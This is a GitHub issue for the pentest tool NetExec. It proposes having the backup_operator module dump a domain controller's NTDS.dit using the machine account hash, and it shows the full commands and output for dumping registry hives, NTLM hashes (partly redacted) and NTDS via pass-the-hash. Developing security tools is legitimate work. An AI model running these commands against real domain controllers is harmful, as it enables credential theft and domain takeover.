NetExec icon indicating copy to clipboard operation
NetExec copied to clipboard
verified publisher icon Pennyw0rth

Add option for backup_operator smb module to use the machine account to dump NTDS.dit

Open Xorriath opened this issue 1 year ago • 2 comments

Please Describe The Problem To Be Solved The smb module backup_operator, fails to dump NTDS.dit when the local administrator account is disabled. I eliminated some lines below for visibility and redacted others.

nxc smb 192.168.210.16 -u '<user>' -p '<password>' -M backup_operator 
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Windows Server 2022 Build 20348 x64 (name:ZPH-SVRCDC01) (domain:internal.zsm.local) (signing:True) (SMBv1:False)
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] internal.zsm.local\<user>:<password>
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     [*] Triggering RemoteRegistry to start through named pipe...
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     Saved HKLM\SAM to \\192.168.210.16\SYSVOL\SAM
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     Saved HKLM\SYSTEM to \\192.168.210.16\SYSVOL\SYSTEM
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     Saved HKLM\SECURITY to \\192.168.210.16\SYSVOL\SECURITY
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Copying "SAM" to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SAM"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] File "SAM" was downloaded to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SAM"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Copying "SECURITY" to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SECURITY"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] File "SECURITY" was downloaded to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SECURITY"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Copying "SYSTEM" to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SYSTEM"
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] File "SYSTEM" was downloaded to "/home/kali/.nxc/logs/ZPH-SVRCDC01_192.168.210.16_2025-02-08_205041.SYSTEM"
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     Administrator:500:aad3b435b51404eeaad3b435b51404ee:5bdd6a33e<redacted>579aa53:::  
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d47a6d<redacted>e393948
SMB         192.168.210.16  445    ZPH-SVRCDC01     [-] internal.zsm.local\Administrator:5bdd6a33efe<redacted>579aa53 STATUS_LOGON_FAILURE 
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     [*] Use the domain admin account to clean the file on the remote host
BACKUP_O... 192.168.210.16  445    ZPH-SVRCDC01     [*] netexec smb dc_ip -u user -p pass -x "del C:\Windows\sysvol\sysvol\SECURITY && del C:\Windows\sysvol\sysvol\SAM && del C:\Windows\sysvol\sysvol\SYSTEM"

(Optional): Suggest A Solution From the output above, it can be seen that the module also dumps the machine account hash which can be used to dump NTDS.dit as well. So there are 3 solutions for this:

  • The module dynamically detects that it cannot dump NTDS.dit as local administrator and then tries again using the machine account hash instead.
  • It can be added as an option to instruct the module to use the machine account hash instead of the local administrator when it tries to dump NTDS.dit
  • Always the machine account hash to dump NTDS.dit

Of the 3 solutions, the first is likely the best. Below is a demonstration of performing the attack with netexec --ntds, thanks to bacup_operators module also providing the machine account hash:

nxc smb 192.168.210.16 -u 'ZPH-SVRCDC01$' -H d47a6d90<redacted>14e393948 --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] y
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Windows Server 2022 Build 20348 x64 (name:ZPH-SVRCDC01) (domain:internal.zsm.local) (signing:True) (SMBv1:False)
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] internal.zsm.local\ZPH-SVRCDC01$:d47a6d<redacted>514e393948 
SMB         192.168.210.16  445    ZPH-SVRCDC01     [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         192.168.210.16  445    ZPH-SVRCDC01     Administrator:500:aad3b435b51404eeaad3b435b51404ee:543b<redacted>8a1760d5e:::
<SNIP>

Xorriath avatar Feb 08 '25 19:02 Xorriath

Maybe the 3rd option would even be the best as there won't be an AD with a disabled DC machine account, but there will definitely (or hopefully) ones with the default DA disabled. @mpgn thoughts?

NeffIsBack avatar Feb 08 '25 19:02 NeffIsBack

3rd option is the best yes ! But you will need to manualy delete the files so

  1. try with dom adm
  2. try with machine account

mpgn avatar Feb 08 '25 19:02 mpgn